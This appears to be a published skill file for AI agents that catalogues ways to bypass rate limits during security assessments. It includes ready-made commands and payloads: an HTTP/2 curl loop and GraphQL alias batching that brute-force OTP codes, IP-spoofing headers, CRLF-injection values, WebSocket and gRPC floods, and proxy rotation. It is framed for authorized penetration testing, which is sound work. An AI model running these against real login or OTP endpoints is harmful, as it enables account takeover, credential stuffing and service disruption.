Hacktricks-skills rate-limit-bypass

Use this skill whenever testing rate limits, brute force protection, OTP verification, login throttling, or any API endpoint with request limits. Trigger on mentions of rate limiting, throttling, brute force, OTP bypass, login limits, API quotas, or when you need to test authentication security. This skill provides techniques to bypass rate limiting mechanisms during authorized security assessments.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/rate-limit-bypass/SKILL.MD

source content

Rate Limit Bypass Techniques

This skill provides methods to bypass rate limiting during authorized security assessments. Use these techniques to test whether rate limiters are properly implemented and can be circumvented.

When to Use This Skill

Testing login/registration endpoints for brute force protection
Verifying OTP/SMS rate limiting effectiveness
Assessing API endpoint throttling
Evaluating authentication security controls
Bug bounty hunting on rate-limited endpoints

Core Techniques

1. Endpoint Variation Testing

Test variations of the target endpoint to find unprotected paths:

/api/v3/sign-up
/api/v1/sign-up
/api/sign-up
/SignUp
/Sing-up
/singup
/resetpwd?someparam=1

Action: Use

scripts/test-endpoint-variations.sh

to automate endpoint discovery.

2. Header Manipulation for IP Spoofing

Modify headers to appear as different clients:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1

Double header technique:

X-Forwarded-For:
X-Forwarded-For: 127.0.0.1

Action: Use

scripts/header-rotation.sh

to test header-based bypasses.

3. HTTP/2 Multiplexing

Modern rate limiters often count TCP connections, not HTTP/2 streams. Send hundreds of requests over a single connection:

# Send 100 POST requests in one HTTP/2 connection
seq 1 100 | xargs -I@ -P0 curl -k --http2-prior-knowledge -X POST \
  -H "Content-Type: application/json" \
  -d '{"code":"@"}' https://target/api/v2/verify &>/dev/null

Action: Use

scripts/http2-multiplex.sh

for automated HTTP/2 attacks.

4. GraphQL Alias Batching

Send multiple operations in one request using aliases:

mutation bruteForceOTP {
  a: verify(code:"111111") { token }
  b: verify(code:"222222") { token }
  c: verify(code:"333333") { token }
  d: verify(code:"444444") { token }
  e: verify(code:"555555") { token }
}

Why this works: Server executes all aliases but rate limiter counts one request.

Action: Use

scripts/graphql-batch.sh

to generate batched queries.

5. Parameter Injection with Blank Characters

Insert special characters to create unique request signatures:

code=1234%0a
email=test%00@example.com
param=value%0d%0aX-Injected: header

Characters to try:

%00

%0d%0a

%0d

%0a

%09

%0C

%20

6. Timing-Based Bypass

If rate limiters use sliding windows, time requests to maximize throughput:

Check
```
X-RateLimit-Reset
```
header for window timing
Fire maximum allowed requests just before reset
Immediately send another burst after reset

Result: Can double throughput without other bypass techniques.

7. WebSocket/gRPC Streaming

Many rate limiters only inspect initial HTTP requests. After upgrade:

# WebSocket flood
seq -w 000000 000999 | websocat -n ws://target.tld/api/verify-ws

# gRPC streaming
grpcurl -d @ -plaintext target.tld:50051 service.VerifyOTP/Stream <<'EOF'
{ "code": "111111" }
{ "code": "222222" }
{ "code": "333333" }
EOF

8. CDN PoP Sharding

Some CDNs shard counters per data center. Route through multiple regions:

for p in $(cat proxies.txt); do
  HTTPS_PROXY=$p curl -s -X POST https://target/api/login -d @payload.json &
done
wait

9. Account/Session Rotation

If limits are per-account:

Use multiple accounts
Rotate session tokens
Login before each attempt to reset counters

10. Response Code Analysis

Even when rate limited, valid inputs may return different codes:

Rate limited:
```
401 Unauthorized
```
Valid OTP:
```
200 OK
```

Action: Monitor response codes carefully during testing.

Attack Workflow

Reconnaissance: Identify rate limit headers (
```
X-RateLimit-*
```
,
```
Retry-After
```
)
Baseline: Determine current limits (requests per minute/hour)
Test Techniques: Try methods in order of effectiveness:
- HTTP/2 multiplexing (highest impact)
- GraphQL batching (if applicable)
- Header manipulation
- Endpoint variations
Validate: Confirm bypass by checking response codes
Document: Record successful techniques for reporting

Tools

Tool	Purpose
Turbo Intruder	HTTP/2 multiplexing, high-performance attacks
Burp IPRotate	Proxy rotation for IP-based limits
hashtag-fuzz	Header randomization, proxy rotation
fireprox	AWS API Gateway disposable endpoints
websocat	WebSocket testing
grpcurl	gRPC streaming attacks

Scripts Available

```
scripts/test-endpoint-variations.sh
```
- Test endpoint variations
```
scripts/header-rotation.sh
```
- Header manipulation testing
```
scripts/http2-multiplex.sh
```
- HTTP/2 multiplexing attacks
```
scripts/graphql-batch.sh
```
- GraphQL alias batching

Safety & Ethics

Only use these techniques on systems you have explicit authorization to test. Rate limit bypass can:

Enable brute force attacks
Facilitate credential stuffing
Cause denial of service

Always:

Obtain written authorization
Document findings responsibly
Report vulnerabilities through proper channels
Respect rate limits during testing to avoid service disruption

Hacktricks-skills rate-limit-bypass

Rate Limit Bypass Techniques

When to Use This Skill

Core Techniques

1. Endpoint Variation Testing

2. Header Manipulation for IP Spoofing

3. HTTP/2 Multiplexing

4. GraphQL Alias Batching

5. Parameter Injection with Blank Characters

6. Timing-Based Bypass

7. WebSocket/gRPC Streaming

8. CDN PoP Sharding

9. Account/Session Rotation

10. Response Code Analysis

Attack Workflow

Tools

Scripts Available

Safety & Ethics

References